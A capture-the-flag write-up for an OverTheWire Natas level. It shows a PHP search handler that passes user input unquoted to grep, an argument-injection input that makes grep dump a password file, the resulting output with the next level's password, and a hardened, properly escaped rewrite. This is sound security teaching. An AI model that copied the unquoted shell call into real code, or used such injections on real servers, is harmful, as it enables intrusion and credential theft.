Natas - Level 11

2 November 2017

Connection information

Information given

The white box is composed of four parts:

  1. The first part is text reading: "For security reasons, we now filter on certain characters"
  2. The second part is an input box with the label Find words containing:
  3. The third is a button named Search
  4. The last is a link View sourcecode pointing to

Getting the password

    $key = "";
    if(array_key_exists("needle", $_REQUEST)) {
      $key = $_REQUEST["needle"];
    }
    if($key != "") {
      // Reject only the characters ; | and &
      if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
      } else {
        // $key is interpolated unquoted into the shell command
        passthru("grep -i $key dictionary.txt");
      }
    }

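As we can see, ";" and "&" (along with "|") are now rejected in our search. No problem: the input is still placed unquoted into the grep command, so a space splits it into a pattern and an extra file argument, and we can just use grep to display everything in /etc/natas_webpass/natas11.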

We enter the following input:

.* /etc/natas_webpass/natas11

Which displays:

.htaccess:AuthType Basic
.htaccess:AuthName "Authentication required"
.htaccess:AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess:require valid-user
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
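
For comparison, here is a hardened counterpart of the handler above, added as an example and not part of the level's own source. The function names build_search_command and search_without_shell are hypothetical, and the dictionary contents are constructed sample data; it assumes a POSIX system with grep installed.

```php
<?php
// Added example: hardened counterpart of the level's handler (not the level's own code).

// Build the grep command so the search term is always exactly one argument.
//  - escapeshellarg() single-quotes the term, so spaces, "*" and "$" stay literal
//  - "--" ends option parsing, so a term starting with "-" is not read as a flag
//  - "-F" makes grep match a fixed string instead of a regular expression
function build_search_command(string $needle, string $dictionary): string
{
    return "grep -i -F -- " . escapeshellarg($needle) . " " . escapeshellarg($dictionary);
}

// Same search without a shell or external process at all.
function search_without_shell(string $needle, string $dictionary): array
{
    if ($needle === "") {
        return [];
    }
    $matches = [];
    foreach (file($dictionary, FILE_IGNORE_NEW_LINES) as $line) {
        if (stripos($line, $needle) !== false) {   // case-insensitive, literal match
            $matches[] = $line;
        }
    }
    return $matches;
}

// Constructed sample dictionary so the example runs offline.
$dictionary = tempnam(sys_get_temp_dir(), "dict");
file_put_contents($dictionary, "apple\nPineapple\nbanana\n");

// A normal search term, then the input used in this write-up.
$inputs = ["apple", ".* /etc/natas_webpass/natas11"];
foreach ($inputs as $input) {
    $out = [];   // exec() appends to an existing array, so reset it each time
    $command = build_search_command($input, $dictionary);
    exec($command, $out, $status);
    echo $command, "\n";
    echo "  grep exit status: $status, lines: ", json_encode($out), "\n";
    echo "  pure PHP result:  ", json_encode(search_without_shell($input, $dictionary)), "\n";
}
unlink($dictionary);
```

With the term quoted, the second input reaches grep as a single literal pattern rather than a pattern plus an extra file name, so only the dictionary is ever searched.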